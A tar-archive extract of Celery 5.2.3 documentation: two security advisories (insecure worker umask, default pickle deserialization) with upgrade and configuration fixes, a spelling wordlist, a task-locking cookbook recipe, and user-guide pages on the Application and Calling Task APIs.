package maintainers are urged to provide their users with updated packages. Please direct questions to the celery-users mailing-list: https://groups.google.com/group/celery-users/, or if you're planning to report a security issue we request that you keep the information confidential by contacting security@celeryproject.org, so that a fix can be issued as quickly as possible. Thank you! ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/sec/CELERYSA-0002.txt0000664000175000017500000000514000000000000016726 0ustar00asifasif00000000000000========================================= CELERYSA-0002: Celery Security Advisory ========================================= :contact: security@celeryproject.org :CVE id: TBA :date: 2014-07-10 05:00:00 p.m. 
UTC Details ======= :package: celery :vulnerability: Environment error :problem type: local :risk: low :versions-affected: 2.5, 3.0, 3.1 Description =========== The built-in utility used to daemonize the Celery worker service sets an insecure umask by default (umask 0). This means that any files or directories created by the worker will end up having world-writable permissions. In practice this means that local users will be able to modify and possibly corrupt the files created by user tasks. This isn't immediately exploitable but can be if those files are later evaluated as a program, for example a task that creates Python program files that are later executed. Patches are now available for all maintained versions (see below), and users are urged to upgrade, even if not directly affected. Acknowledgments =============== Special thanks to Red Hat for originally discovering and reporting the issue. Systems affected ================ Users of Celery versions 3.0, and 3.1, except the recently released 3.1.13, are affected if daemonizing the Celery programs using the `--detach` argument or using the `celery multi` program to start workers in the background, without setting a custom `--umask` argument. Solution ======== NOTE: Not all users of Celery will use it to create files, but if you do then files may already have been created with insecure permissions. So after upgrading, or using the workaround, then please make sure that files already created aren't world writable. To work around the issue you can set a custom umask using the ``--umask`` argument: $ celery worker -l info --detach --umask=18 # (022) Or you can upgrade to a more recent version: - Users of the 3.1 series should upgrade to 3.1.13: * ``pip install -U celery``, or * ``easy_install -U celery``, or * https://pypi.org/project/celery/3.1.13/ - Users of the 3.0 series should upgrade to 3.0.25: * ``pip install -U celery==3.0.25``, or * ``easy_install -U celery==3.0.25``, or * https://pypi.org/project/celery/3.0.25/ Distribution package maintainers are urged to provide their users with updated packages. Please direct questions to the celery-users mailing-list: https://groups.google.com/group/celery-users/, or if you're planning to report a new security related issue we request that you keep the information confidential by contacting security@celeryproject.org instead. Thank you! ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/sec/CELERYSA-0003.txt0000664000175000017500000000301700000000000016730 0ustar00asifasif00000000000000========================================= CELERYSA-0003: Celery Security Advisory ========================================= :contact: security@celeryproject.org :CVE id: TBA :date: 2016-12-08 05:00:00 p.m. PST Details ======= :package: celery :vulnerability: Configuration Error :problem type: remote :risk: low :versions-affected: 4.0.0 Description =========== The default configuration in Celery 4.0.0 allowed for deserialization of pickled messages, even if the software is configured to send messages in the JSON format. The particular configuration in question is the `accept_content` setting, which by default was set to: app.conf.accept_content = ['json', 'pickle', 'msgpack', 'yaml'] The risk is still set to low considering that an attacker would require access to the message broker used to send messages to Celery workers. Systems affected ================ Users of Celery version 4.0.0 with no explicit accept_content setting set. 
Solution ======== To work around the issue you can explicitly configure the accept_content setting: app.conf.accept_content = ['json'] Or you can upgrade to the Celery 4.0.1 version: $ pip install -U celery Distribution package maintainers are urged to provide their users with updated packages. Please direct questions to the celery-users mailing-list: https://groups.google.com/group/celery-users/, or if you're planning to report a new security related issue we request that you keep the information confidential by contacting security@celeryproject.org instead. Thank you! ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/spelling_wordlist.txt0000664000175000017500000001141700000000000020136 0ustar00asifasif00000000000000許邱翔 AMQP Adriaenssens Adrien Agris Ahmet Aitor Akira Alain Alcides Aleksandr Alexey Allard Alman Almeer Ameriks Andreas Andrey Andriy Aneil ArangoDB Areski Armin Artyom Atanasov Attias Attwood Autechre Axel Aziz Azovskov Babiy Bargen Baumgold Belaid Bence Berker Bevan Biel Bistuer Bolshakov Bouterse Bozorgkhan Brakhane Brendon Breshears Bridgen Briem Brodie Bryson Buckens Bujniewicz Buttu CPython Carvalho Cassandra Catalano Catalin Chamberlin Chiastic Chintomby Christoph Cipater Clowes Cobertura Codeb CouchDB Couchbase Cramer Cristian Cron Crontab Crontabs Czajka Danilo Daodao Dartiguelongue Davanum Davide Davidsson Deane Dees Dein Delalande Demir Django Dmitry Dubus Dudás Duggan Duryee Elasticsearch Engledew Eran Erway Esquivel Farrimond Farwell Fatih Feanil Fladischer Flavio Floering Fokau Frantisek Gao Garnero Gauvrit Gedminas Georgievsky Germán Gheem Gilles GitHub Gómez Goiri Gorbunov Grainger Greinhofer Grégoire Groner Grossi Guillaume Guinet Gunnlaugur Gylfason Haag Harnly Harrigan Haskins Helmers Helmig Henrik Heroku Hoch Hoeve Hogni Holop Homebrew Honza Hsad Hu Hynek IP Iacob Idan Ignas Illes Ilya Ionel IronCache Iurii Jaillet Jameel Janež Jelle Jellick Jerzy Jevnik Jiangmiao Jirka Johansson Julien Jython Kai Kalinowski Kamara Katz Khera KiB Kilgo Kirill Kiriukha Kirkham Kjartansson Klindukh Kombu Konstantin Konstantinos Kornelijus Korner Koshelev Kotlyarov Kouhei Koukopoulos Koval Kozera Kracekumar Kral Kriachko Krybus Krzysztof Kumar Kupershmidt Kuznetsov Lamport Langford Latitia Lavin Lawley Lebedev Ledesma Legrand Loic Luckie Maeda Maślanka Malinovsky Mallavarapu Manipon Marcio Maries Markey Markus Marlow Masiero Matsuzaki Maxime McGregor Melin Memcached Metzlar Mher Mickaël Mikalajūnas Milen Mitar Modrzejewski MongoDB Movsisyan Mărieș Môshe Munin Nagurney Nextdoor Nik Nikolov Node.js Northway Nyby ORM O'Reilly Oblovatniy Omer Ordoquy Ori Parncutt Patrin Paulo Pavel Pavlovic Pearce Peksag Penhard Pepijn Permana Petersson Petrello Pika Piotr Podshumok Poissonnier Pomfrey Pär Pravec Pulec Pyro QoS Qpid Quarta RPC RSS Rabbaglietti RabbitMQ Rackspace Radek Raghuram Ramaraju Rao Raphaël Rattray Redis Remigiusz Remy Renberg Riak Ribeiro Rinat Rémy Robenolt Rodionoff Romuald Ronacher Rongze Rossi Rouberol Rudakou Rundstein SQLAlchemy SQS Sadaoui Savchenko Savvides Schlawack Schottdorf Schwarz Selivanov SemVer Seong Sergey Seungha Shigapov Slinckx Smirnov Solem Solt Sosnovskiy Srinivas Srinivasan Stas StateDB Steeve Sterre Streeter Sucu Sukrit Survila SysV Tadej Tallon Tamas Tantiras Taub Tewfik Theo Thrift Tikhonov Tobias Tochev Tocho Tsigularov Twomey URI Ullmann Unix Valentyn Vanderbauwhede Varona Vdb Veatch Vejrazka Verhagen Verstraaten Viamontes Viktor Vitaly Vixie Voronov Vos Vsevolod Webber 
Werkzeug Whitlock Widman Wieslander Wil Wiman Wun Yaroslav Younkins Yu Yurchuk Yury Yuval Zarowny Zatelepin Zaytsev Zhaorong Zhavoronkov Zhu Zoë Zoran abortable ack acked acking acks acyclic arg args arity async autocommit autodoc autoscale autoscaler autoscalers autoscaling backend backends backport backported backtrace bootstep bootsteps bufsize bugfix callbacks celerymon changelog chunking cipater committer committers compat conf config contrib coroutine coroutines cronjob cryptographic daemonization daemonize daemonizing dburi de deprecated deprecations der deserialization deserialize deserialized deserializes deserializing destructor distro Ádám docstring docstrings embeddable encodable errbacks euid eventlet exc execv exitcode failover fanout filename gevent gid greenlet greenlets greenthreads hashable hostname http idempotence ident indices init initializer instantiation interoperability iterable js json kombu kwargs logfile login loglevel lookup memoization memoize memoized misconfiguration misconfigure misconfigured msgpack multi mutex mutexes natively nodename nullipotent optimizations persister pickleable pid pidbox pidfile pidfiles pluggable poller pre prefetch prefetched prefetching prefork preload preloading prepend prepended programmatically proj protobuf rdb reStructured rebased rebasing redelivered redelivery reentrancy reentrant refactor refactored refactoring referenceable regex regexes reloader resize resized resizing rtype runlevel runtime screenshot screenshots semipredicate semipredicates serializable serialized serializer serializers serializes serializing starmap stderr stdlib stdout subclasses subclassing submodule subtask subtasks supervisord symlink symlinked symlinks taskset timezones tracebacks tuple tuples uid Łukasz umask unacked undeliverable unencrypted unlink unlinked unlinks unmanaged unorderable unpickleable unpickled unregister unrepresentable unroutable untrusted username usernames utcoffset utils versa versioning wbits weakref weakrefs webhook webhooks writable yaml metavar const nargs dest questionark amongst requeue wildcard ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/templates/0000775000175000017500000000000000000000000015623 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/templates/readme.txt0000664000175000017500000000225500000000000017625 0ustar00asifasif00000000000000.. image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |license| |wheel| |pyversion| |pyimp| .. include:: ../includes/introduction.txt .. include:: ../includes/installation.txt .. include:: ../includes/resources.txt .. |build-status| image:: https://secure.travis-ci.org/celery/celery.png?branch=master :alt: Build status :target: https://travis-ci.org/celery/celery .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. 
|pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Support Python implementations. :target: https://pypi.org/project/celery/ ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/tutorials/0000775000175000017500000000000000000000000015653 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/daemonizing.html0000664000175000017500000000012600000000000021044 0ustar00asifasif00000000000000Moved ===== This document has been moved into the userguide. See :ref:`daemonizing` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/debugging.html0000664000175000017500000000013300000000000020471 0ustar00asifasif00000000000000Moved ===== This document has been moved into the userguide. See :ref:`guide-debugging`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/index.rst0000664000175000017500000000017100000000000017513 0ustar00asifasif00000000000000=========== Tutorials =========== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 task-cookbook ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/task-cookbook.rst0000664000175000017500000000531600000000000021160 0ustar00asifasif00000000000000.. _cookbook-tasks: ================ Task Cookbook ================ .. contents:: :local: .. _cookbook-task-serial: Ensuring a task is only executed one at a time ============================================== You can accomplish this by using a lock. In this example we'll be using the cache framework to set a lock that's accessible for all workers. It's part of an imaginary RSS feed importer called `djangofeeds`. The task takes a feed URL as a single argument, and imports that feed into a Django model called `Feed`. We ensure that it's not possible for two or more workers to import the same feed at the same time by setting a cache key consisting of the MD5 check-sum of the feed URL. The cache key expires after some time in case something unexpected happens, and something always will... For this reason your tasks run-time shouldn't exceed the timeout. .. note:: In order for this to work correctly you need to be using a cache backend where the ``.add`` operation is atomic. ``memcached`` is known to work well for this purpose. .. 
code-block:: python import time from celery import shared_task from celery.utils.log import get_task_logger from contextlib import contextmanager from django.core.cache import cache from hashlib import md5 from djangofeeds.models import Feed logger = get_task_logger(__name__) LOCK_EXPIRE = 60 * 10 # Lock expires in 10 minutes @contextmanager def memcache_lock(lock_id, oid): timeout_at = time.monotonic() + LOCK_EXPIRE - 3 # cache.add fails if the key already exists status = cache.add(lock_id, oid, LOCK_EXPIRE) try: yield status finally: # memcache delete is very slow, but we have to use it to take # advantage of using add() for atomic locking if time.monotonic() < timeout_at and status: # don't release the lock if we exceeded the timeout # to lessen the chance of releasing an expired lock # owned by someone else # also don't release the lock if we didn't acquire it cache.delete(lock_id) @shared_task(bind=True) def import_feed(self, feed_url): # The cache key consists of the task name and the MD5 digest # of the feed URL. feed_url_hexdigest = md5(feed_url.encode()).hexdigest() lock_id = '{0}-lock-{1}'.format(self.name, feed_url_hexdigest) logger.debug('Importing feed: %s', feed_url) with memcache_lock(lock_id, self.app.oid) as acquired: if acquired: return Feed.objects.import_feed(feed_url).url logger.debug( 'Feed %s is already being imported by another worker', feed_url) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.699755 celery-5.2.3/docs/userguide/0000775000175000017500000000000000000000000015621 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/application.rst0000664000175000017500000003460500000000000020666 0ustar00asifasif00000000000000.. _guide-app: ============= Application ============= .. contents:: :local: :depth: 1 The Celery library must be instantiated before use; this instance is called an application (or *app* for short). The application is thread-safe so that multiple Celery applications with different configurations, components, and tasks can co-exist in the same process space. Let's create one now: .. code-block:: pycon >>> from celery import Celery >>> app = Celery() >>> app The last line shows the textual representation of the application: including the name of the app class (``Celery``), the name of the current main module (``__main__``), and the memory address of the object (``0x100469fd0``). Main Name ========= Only one of these is important, and that's the main module name. Let's look at why that is. When you send a task message in Celery, that message won't contain any source code, but only the name of the task you want to execute. This works similarly to how host names work on the internet: every worker maintains a mapping of task names to their actual functions, called the *task registry*. Whenever you define a task, that task will also be added to the local registry: .. code-block:: pycon >>> @app.task ... def add(x, y): ... return x + y >>> add <@task: __main__.add> >>> add.name __main__.add >>> app.tasks['__main__.add'] <@task: __main__.add> and there you see that ``__main__`` again; whenever Celery isn't able to detect what module the function belongs to, it uses the main module name to generate the beginning of the task name. This is only a problem in a limited set of use cases: #. If the module that the task is defined in is run as a program. #. If the application is created in the Python shell (REPL).
For example here, where the tasks module is also used to start a worker with :meth:`@worker_main`: :file:`tasks.py`: .. code-block:: python from celery import Celery app = Celery() @app.task def add(x, y): return x + y if __name__ == '__main__': app.worker_main() When this module is executed the tasks will be named starting with "``__main__``", but when the module is imported by another process, say to call a task, the tasks will be named starting with "``tasks``" (the real name of the module): .. code-block:: pycon >>> from tasks import add >>> add.name tasks.add You can specify another name for the main module: .. code-block:: pycon >>> app = Celery('tasks') >>> app.main 'tasks' >>> @app.task ... def add(x, y): ... return x + y >>> add.name tasks.add .. seealso:: :ref:`task-names` Configuration ============= There are several options you can set that'll change how Celery works. These options can be set directly on the app instance, or you can use a dedicated configuration module. The configuration is available as :attr:`@conf`: .. code-block:: pycon >>> app.conf.timezone 'Europe/London' where you can also set configuration values directly: .. code-block:: pycon >>> app.conf.enable_utc = True or update several keys at once by using the ``update`` method: .. code-block:: python >>> app.conf.update( ... enable_utc=True, ... timezone='Europe/London', ...) The configuration object consists of multiple dictionaries that are consulted in order: #. Changes made at run-time. #. The configuration module (if any) #. The default configuration (:mod:`celery.app.defaults`). You can even add new default sources by using the :meth:`@add_defaults` method. .. seealso:: Go to the :ref:`Configuration reference ` for a complete listing of all the available settings, and their default values. ``config_from_object`` ---------------------- The :meth:`@config_from_object` method loads configuration from a configuration object. This can be a configuration module, or any object with configuration attributes. Note that any configuration that was previously set will be reset when :meth:`~@config_from_object` is called. If you want to set additional configuration you should do so after. Example 1: Using the name of a module ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :meth:`@config_from_object` method can take the fully qualified name of a Python module, or even the name of a Python attribute, for example: ``"celeryconfig"``, ``"myproj.config.celery"``, or ``"myproj.config:CeleryConfig"``: .. code-block:: python from celery import Celery app = Celery() app.config_from_object('celeryconfig') The ``celeryconfig`` module may then look like this: :file:`celeryconfig.py`: .. code-block:: python enable_utc = True timezone = 'Europe/London' and the app will be able to use it as long as ``import celeryconfig`` is possible. Example 2: Passing an actual module object ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can also pass an already imported module object, but this isn't always recommended. .. tip:: Using the name of a module is recommended as this means the module does not need to be serialized when the prefork pool is used. If you're experiencing configuration problems or pickle errors then please try using the name of a module instead. .. code-block:: python import celeryconfig from celery import Celery app = Celery() app.config_from_object(celeryconfig) Example 3: Using a configuration class/object ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. 
code-block:: python from celery import Celery app = Celery() class Config: enable_utc = True timezone = 'Europe/London' app.config_from_object(Config) # or using the fully qualified name of the object: # app.config_from_object('module:Config') ``config_from_envvar`` ---------------------- The :meth:`@config_from_envvar` takes the configuration module name from an environment variable For example -- to load configuration from a module specified in the environment variable named :envvar:`CELERY_CONFIG_MODULE`: .. code-block:: python import os from celery import Celery #: Set default configuration module name os.environ.setdefault('CELERY_CONFIG_MODULE', 'celeryconfig') app = Celery() app.config_from_envvar('CELERY_CONFIG_MODULE') You can then specify the configuration module to use via the environment: .. code-block:: console $ CELERY_CONFIG_MODULE="celeryconfig.prod" celery worker -l INFO .. _app-censored-config: Censored configuration ---------------------- If you ever want to print out the configuration, as debugging information or similar, you may also want to filter out sensitive information like passwords and API keys. Celery comes with several utilities useful for presenting the configuration, one is :meth:`~celery.app.utils.Settings.humanize`: .. code-block:: pycon >>> app.conf.humanize(with_defaults=False, censored=True) This method returns the configuration as a tabulated string. This will only contain changes to the configuration by default, but you can include the built-in default keys and values by enabling the ``with_defaults`` argument. If you instead want to work with the configuration as a dictionary, you can use the :meth:`~celery.app.utils.Settings.table` method: .. code-block:: pycon >>> app.conf.table(with_defaults=False, censored=True) Please note that Celery won't be able to remove all sensitive information, as it merely uses a regular expression to search for commonly named keys. If you add custom settings containing sensitive information you should name the keys using a name that Celery identifies as secret. A configuration setting will be censored if the name contains any of these sub-strings: ``API``, ``TOKEN``, ``KEY``, ``SECRET``, ``PASS``, ``SIGNATURE``, ``DATABASE`` Laziness ======== The application instance is lazy, meaning it won't be evaluated until it's actually needed. Creating a :class:`@Celery` instance will only do the following: #. Create a logical clock instance, used for events. #. Create the task registry. #. Set itself as the current app (but not if the ``set_as_current`` argument was disabled) #. Call the :meth:`@on_init` callback (does nothing by default). The :meth:`@task` decorators don't create the tasks at the point when the task is defined, instead it'll defer the creation of the task to happen either when the task is used, or after the application has been *finalized*, This example shows how the task isn't created until you use the task, or access an attribute (in this case :meth:`repr`): .. code-block:: pycon >>> @app.task >>> def add(x, y): ... return x + y >>> type(add) >>> add.__evaluated__() False >>> add # <-- causes repr(add) to happen <@task: __main__.add> >>> add.__evaluated__() True *Finalization* of the app happens either explicitly by calling :meth:`@finalize` -- or implicitly by accessing the :attr:`@tasks` attribute. Finalizing the object will: #. 
Copy tasks that must be shared between apps Tasks are shared by default, but if the ``shared`` argument to the task decorator is disabled, then the task will be private to the app it's bound to. #. Evaluate all pending task decorators. #. Make sure all tasks are bound to the current app. Tasks are bound to an app so that they can read default values from the configuration. .. _default-app: .. topic:: The "default app" Celery didn't always have applications, it used to be that there was only a module-based API. A compatibility API was available at the old location until the release of Celery 5.0, but has been removed. Celery always creates a special app - the "default app", and this is used if no custom application has been instantiated. The :mod:`celery.task` module is no longer available. Use the methods on the app instance, not the module based API: .. code-block:: python from celery.task import Task # << OLD Task base class. from celery import Task # << NEW base class. Breaking the chain ================== While it's possible to depend on the current app being set, the best practice is to always pass the app instance around to anything that needs it. I call this the "app chain", since it creates a chain of instances depending on the app being passed. The following example is considered bad practice: .. code-block:: python from celery import current_app class Scheduler: def run(self): app = current_app Instead it should take the ``app`` as an argument: .. code-block:: python class Scheduler: def __init__(self, app): self.app = app Internally Celery uses the :func:`celery.app.app_or_default` function so that everything also works in the module-based compatibility API .. code-block:: python from celery.app import app_or_default class Scheduler: def __init__(self, app=None): self.app = app_or_default(app) In development you can set the :envvar:`CELERY_TRACE_APP` environment variable to raise an exception if the app chain breaks: .. code-block:: console $ CELERY_TRACE_APP=1 celery worker -l INFO .. topic:: Evolving the API Celery has changed a lot from 2009 since it was initially created. For example, in the beginning it was possible to use any callable as a task: .. code-block:: pycon def hello(to): return 'hello {0}'.format(to) >>> from celery.execute import apply_async >>> apply_async(hello, ('world!',)) or you could also create a ``Task`` class to set certain options, or override other behavior .. code-block:: python from celery import Task from celery.registry import tasks class Hello(Task): queue = 'hipri' def run(self, to): return 'hello {0}'.format(to) tasks.register(Hello) >>> Hello.delay('world!') Later, it was decided that passing arbitrary call-able's was an anti-pattern, since it makes it very hard to use serializers other than pickle, and the feature was removed in 2.0, replaced by task decorators: .. code-block:: python from celery import app @app.task(queue='hipri') def hello(to): return 'hello {0}'.format(to) Abstract Tasks ============== All tasks created using the :meth:`@task` decorator will inherit from the application's base :attr:`~@Task` class. You can specify a different base class using the ``base`` argument: .. code-block:: python @app.task(base=OtherTask): def add(x, y): return x + y To create a custom task class you should inherit from the neutral base class: :class:`celery.Task`. .. 
code-block:: python from celery import Task class DebugTask(Task): def __call__(self, *args, **kwargs): print('TASK STARTING: {0.name}[{0.request.id}]'.format(self)) return self.run(*args, **kwargs) .. tip:: If you override the task's ``__call__`` method, then it's very important that you also call ``self.run`` to execute the body of the task. Do not call ``super().__call__``. The ``__call__`` method of the neutral base class :class:`celery.Task` is only present for reference. For optimization, this has been unrolled into ``celery.app.trace.build_tracer.trace_task`` which calls ``run`` directly on the custom task class if no ``__call__`` method is defined. The neutral base class is special because it's not bound to any specific app yet. Once a task is bound to an app it'll read configuration to set default values, and so on. To realize a base class you need to create a task using the :meth:`@task` decorator: .. code-block:: python @app.task(base=DebugTask) def add(x, y): return x + y It's even possible to change the default base class for an application by changing its :meth:`@Task` attribute: .. code-block:: pycon >>> from celery import Celery, Task >>> app = Celery() >>> class MyBaseTask(Task): ... queue = 'hipri' >>> app.Task = MyBaseTask >>> app.Task >>> @app.task ... def add(x, y): ... return x + y >>> add <@task: __main__.add> >>> add.__class__.mro() [>, , , ] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/calling.rst0000664000175000017500000005532000000000000017771 0ustar00asifasif00000000000000.. _guide-calling: =============== Calling Tasks =============== .. contents:: :local: :depth: 1 .. _calling-basics: Basics ====== This document describes Celery's uniform "Calling API" used by task instances and the :ref:`canvas `. The API defines a standard set of execution options, as well as three methods: - ``apply_async(args[, kwargs[, …]])`` Sends a task message. - ``delay(*args, **kwargs)`` Shortcut to send a task message, but doesn't support execution options. - *calling* (``__call__``) Applying an object supporting the calling API (e.g., ``add(2, 2)``) means that the task will not be executed by a worker, but in the current process instead (a message won't be sent). .. _calling-cheat: .. topic:: Quick Cheat Sheet - ``T.delay(arg, kwarg=value)`` Star arguments shortcut to ``.apply_async``. (``.delay(*args, **kwargs)`` calls ``.apply_async(args, kwargs)``). - ``T.apply_async((arg,), {'kwarg': value})`` - ``T.apply_async(countdown=10)`` executes in 10 seconds from now. - ``T.apply_async(eta=now + timedelta(seconds=10))`` executes in 10 seconds from now, specified using ``eta`` - ``T.apply_async(countdown=60, expires=120)`` executes in one minute from now, but expires after 2 minutes. - ``T.apply_async(expires=now + timedelta(days=2))`` expires in 2 days, set using :class:`~datetime.datetime`. Example ------- The :meth:`~@Task.delay` method is convenient as it looks like calling a regular function: .. code-block:: python task.delay(arg1, arg2, kwarg1='x', kwarg2='y') Using :meth:`~@Task.apply_async` instead you have to write: .. code-block:: python task.apply_async(args=[arg1, arg2], kwargs={'kwarg1': 'x', 'kwarg2': 'y'}) .. sidebar:: Tip If the task isn't registered in the current process you can use :meth:`~@send_task` to call the task by name instead. So `delay` is clearly convenient, but if you want to set additional execution options you have to use ``apply_async``. 
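As a quick preview, here's a sketch of a single ``apply_async`` call that combines several of the execution options covered below (the broker URL, queue name, and option values are arbitrary placeholders, not recommendations):

.. code-block:: python

    from celery import Celery

    # Placeholder app and task, standing in for your own project's setup.
    app = Celery('proj', broker='amqp://')

    @app.task
    def add(x, y):
        return x + y

    result = add.apply_async(
        (2, 2),          # positional arguments passed to the task
        countdown=10,    # execute no earlier than 10 seconds from now
        expires=120,     # discard the message if not started within 2 minutes
        queue='celery',  # name of the queue to route the message to
        retry=True,      # retry publishing if the broker connection fails
    )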
The rest of this document will go into the task execution options in detail. All examples use a task called `add`, returning the sum of two arguments: .. code-block:: python @app.task def add(x, y): return x + y .. topic:: There's another way… You'll learn more about this later while reading about the :ref:`Canvas <guide-canvas>`, but :class:`~celery.signature`'s are objects used to pass around the signature of a task invocation (for example to send it over the network), and they also support the Calling API: .. code-block:: python task.s(arg1, arg2, kwarg1='x', kwarg2='y').apply_async() .. _calling-links: Linking (callbacks/errbacks) ============================ Celery supports linking tasks together so that one task follows another. The callback task will be applied with the result of the parent task as a partial argument: .. code-block:: python add.apply_async((2, 2), link=add.s(16)) .. sidebar:: What's ``s``? The ``add.s`` call used here is called a signature. If you don't know what they are you should read about them in the :ref:`canvas guide <guide-canvas>`. There you can also learn about :class:`~celery.chain`: a simpler way to chain tasks together. In practice the ``link`` execution option is considered an internal primitive, and you'll probably not use it directly, but use chains instead. Here the result of the first task (4) will be sent to a new task that adds 16 to the previous result, forming the expression :math:`(2 + 2) + 16 = 20` You can also cause a callback to be applied if a task raises an exception (*errback*). The worker won't actually call the errback as a task, but will instead call the errback function directly so that the raw request, exception and traceback objects can be passed to it. This is an example error callback: .. code-block:: python @app.task def error_handler(request, exc, traceback): print('Task {0} raised exception: {1!r}\n{2!r}'.format( request.id, exc, traceback)) It can be added to the task using the ``link_error`` execution option: .. code-block:: python add.apply_async((2, 2), link_error=error_handler.s()) In addition, both the ``link`` and ``link_error`` options can be expressed as a list: .. code-block:: python add.apply_async((2, 2), link=[add.s(16), other_task.s()]) The callbacks/errbacks will then be called in order, and all callbacks will be called with the return value of the parent task as a partial argument. .. _calling-on-message: On message ========== Celery supports catching all state changes by setting the ``on_message`` callback. For example, for long-running tasks you can send task progress updates like this: .. code-block:: python @app.task(bind=True) def hello(self, a, b): time.sleep(1) self.update_state(state="PROGRESS", meta={'progress': 50}) time.sleep(1) self.update_state(state="PROGRESS", meta={'progress': 90}) time.sleep(1) return 'hello world: %i' % (a+b) .. code-block:: python def on_raw_message(body): print(body) a, b = 1, 1 r = hello.apply_async(args=(a, b)) print(r.get(on_message=on_raw_message, propagate=False)) Will generate output like this: .. code-block:: text {'task_id': '5660d3a3-92b8-40df-8ccc-33a5d1d680d7', 'result': {'progress': 50}, 'children': [], 'status': 'PROGRESS', 'traceback': None} {'task_id': '5660d3a3-92b8-40df-8ccc-33a5d1d680d7', 'result': {'progress': 90}, 'children': [], 'status': 'PROGRESS', 'traceback': None} {'task_id': '5660d3a3-92b8-40df-8ccc-33a5d1d680d7', 'result': 'hello world: 2', 'children': [], 'status': 'SUCCESS', 'traceback': None} hello world: 2 ..
_calling-eta: ETA and Countdown ================= The ETA (estimated time of arrival) lets you set a specific date and time that is the earliest time at which your task will be executed. `countdown` is a shortcut to set ETA by seconds into the future. .. code-block:: pycon >>> result = add.apply_async((2, 2), countdown=3) >>> result.get() # this takes at least 3 seconds to return 4 The task is guaranteed to be executed at some time *after* the specified date and time, but not necessarily at that exact time. Possible reasons for broken deadlines may include many items waiting in the queue, or heavy network latency. To make sure your tasks are executed in a timely manner you should monitor the queue for congestion. Use Munin, or similar tools, to receive alerts, so appropriate action can be taken to ease the workload. See :ref:`monitoring-munin`. While `countdown` is an integer, `eta` must be a :class:`~datetime.datetime` object, specifying an exact date and time (including millisecond precision, and timezone information): .. code-block:: pycon >>> from datetime import datetime, timedelta >>> tomorrow = datetime.utcnow() + timedelta(days=1) >>> add.apply_async((2, 2), eta=tomorrow) .. warning:: When using RabbitMQ as a message broker and specifying a ``countdown`` over 15 minutes, you may run into the problem that the worker terminates with a :exc:`~amqp.exceptions.PreconditionFailed` error: .. code-block:: pycon amqp.exceptions.PreconditionFailed: (0, 0): (406) PRECONDITION_FAILED - consumer ack timed out on channel In RabbitMQ since version 3.8.15 the default value for ``consumer_timeout`` is 15 minutes. Since version 3.8.17 it was increased to 30 minutes. If a consumer does not ack its delivery for more than the timeout value, its channel will be closed with a ``PRECONDITION_FAILED`` channel exception. See `Delivery Acknowledgement Timeout`_ for more information. To solve the problem, in the RabbitMQ configuration file ``rabbitmq.conf`` you should set the ``consumer_timeout`` parameter to a value greater than or equal to your countdown value. For example, you can specify a very large value of ``consumer_timeout = 31622400000``, which is equal to 1 year in milliseconds, to avoid problems in the future. .. _`Delivery Acknowledgement Timeout`: https://www.rabbitmq.com/consumers.html#acknowledgement-timeout .. _calling-expiration: Expiration ========== The `expires` argument defines an optional expiry time, either as seconds after task publish, or a specific date and time using :class:`~datetime.datetime`: .. code-block:: pycon >>> # Task expires after one minute from now. >>> add.apply_async((10, 10), expires=60) >>> # Also supports datetime >>> from datetime import datetime, timedelta >>> add.apply_async((10, 10), ... expires=datetime.now() + timedelta(days=1)) When a worker receives an expired task it will mark the task as :state:`REVOKED` (:exc:`~@TaskRevokedError`). .. _calling-retry: Message Sending Retry ===================== Celery will automatically retry sending messages in the event of connection failure, and retry behavior can be configured -- like how often to retry, or a maximum number of retries -- or disabled altogether. To disable retry you can set the ``retry`` execution option to :const:`False`: .. code-block:: python add.apply_async((2, 2), retry=False) .. topic:: Related Settings ..
